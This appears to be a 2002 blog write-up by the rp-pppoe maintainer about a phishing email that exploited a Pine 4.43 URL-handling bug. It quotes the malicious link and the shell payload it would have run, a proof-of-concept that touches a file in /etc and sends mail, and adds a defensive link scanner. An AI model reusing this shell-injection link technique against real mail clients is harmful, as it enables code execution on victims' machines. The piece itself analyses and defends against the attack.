
Fifth Entry

The fifth entry in my challenge to infect my Linux desktop machine is a very worthy contender. It could have succeeded. Here's how the e-mail appeared in my text-mode mail reader:

Date: Tue, 15 Jan 2002 18:43:28 -0500
From: Jody McIntyre
To: dfs@roaringpenguin.com
Subject: Severe vulnerability found in rp-pppoe

I recently discovered a buffer overflow in rp-pppoe v3.3 that allows a
local root compromise if pppoe is running. A detailed description of the
problem can be found at my website. I will not be publicising the
vulnerability until you have a chance to fix the problem.


This was an amazing piece of social engineering, and I almost fell for it. I maintain the rp-pppoe package, and of course would be very concerned about a local root compromise. I was suspicious, however, because rp-pppoe is not installed set-uid, so I could not see how a local root compromise would be possible. So I got my mail program to show me all the headers in the message, which also reveals any HTML code. Here's a snippet of the expanded message (I have wrapped lines for readability):

A detailed description of the problem can be found at my
<a href="http://www.modernduck.com/jodym/rp-pppoe/rp-pppoe-vuln.html'&

Well, the URL for the "website" link looks somewhat suspicious. In fact, it exploits a bug in Pine 4.43, and the sender may have known that I use the Pine mailer. I had, however, upgraded to Pine 4.44, which is not susceptible to this particular bug. Had I clicked on the link in Pine 4.43 or earlier, the following code would have been downloaded and run:

touch /etc/VIRUS-WAS-HERE &>/dev/null
echo | mail -s "I GET THE PRIZE" -c postmaster@roaringpenguin.com dfs@roaringpenguin.com
# Yeah, the touch won't work if you aren't running pine as root.  If I was
# more malicious (and had more time) I could go out and patch the install
# target of all the Makefiles on your system (for example) to run the above
# commands, instead of doing it here.  So I guess this is more of a proof of
# concept than a serious contender for the prize.  I hope you don't mind my
# attempt to notify myself:
echo | mail -s "w00t" <deleted_for_privacy_reasons>
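The weak point this entry targeted is a mailer that hands a link's URL to a shell, so a quote or ampersand inside the href breaks out of the command. A defender-side check for that pattern, written as an added example for this article (it is not the author's code or part of any mailer); the sample message is constructed from the href prefix shown above plus a harmless second link:

```python
from html.parser import HTMLParser

# Characters a shell would interpret if a mail client builds a command
# line out of a URL instead of passing it as a single argument.
SHELL_METACHARS = set("'\"`;&|$<>(){}\n")

# Constructed sample: the first href mirrors the prefix quoted in the
# article (the rest of the original link was not shown, so the attribute
# is simply closed here); the second is a benign, made-up link.
SAMPLE_HTML = (
    '<p>A detailed description of the problem can be found at my '
    '<a href="http://www.modernduck.com/jodym/rp-pppoe/rp-pppoe-vuln.html\'&">'
    'website</a>. See also <a href="http://example.com/advisory.html">this</a>.</p>'
)


class _HrefCollector(HTMLParser):
    """Collect every href attribute found on <a> tags in an HTML fragment."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "a":
            for name, value in attrs:
                if name.lower() == "href" and value is not None:
                    self.hrefs.append(value)


def extract_hrefs(html):
    """Return all href values in document order."""
    parser = _HrefCollector()
    parser.feed(html)
    return parser.hrefs


def suspicious_chars(url):
    """Sorted list of shell metacharacters present in a URL (empty if clean)."""
    return sorted(c for c in set(url) if c in SHELL_METACHARS)


def flag_links(html):
    """Return (href, offending characters) for every link that would be
    unsafe to hand to a shell-invoked browser; clean links are omitted."""
    return [(h, suspicious_chars(h)) for h in extract_hrefs(html)
            if suspicious_chars(h)]


if __name__ == "__main__":
    for href, chars in flag_links(SAMPLE_HTML):
        print("suspicious link:", href, "contains", chars)
```

The durable fix is for the mailer to exec the browser with the URL as one argv element rather than through a shell; this scan only surfaces links that would abuse the weaker behaviour.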

This entry is the closest one yet, and I may yet have to pay up. However, although the entry was very well crafted to attack me in particular, I do not think it would propagate well. I do not use Pine's address book, so a virus would have to use other means to find out my friends' names for propagation purposes. And very few of the people I correspond with run Pine, so propagation would have been stopped by software diversity.


David F. Skoll

Copyright © 2004 Roaring Penguin Software Inc.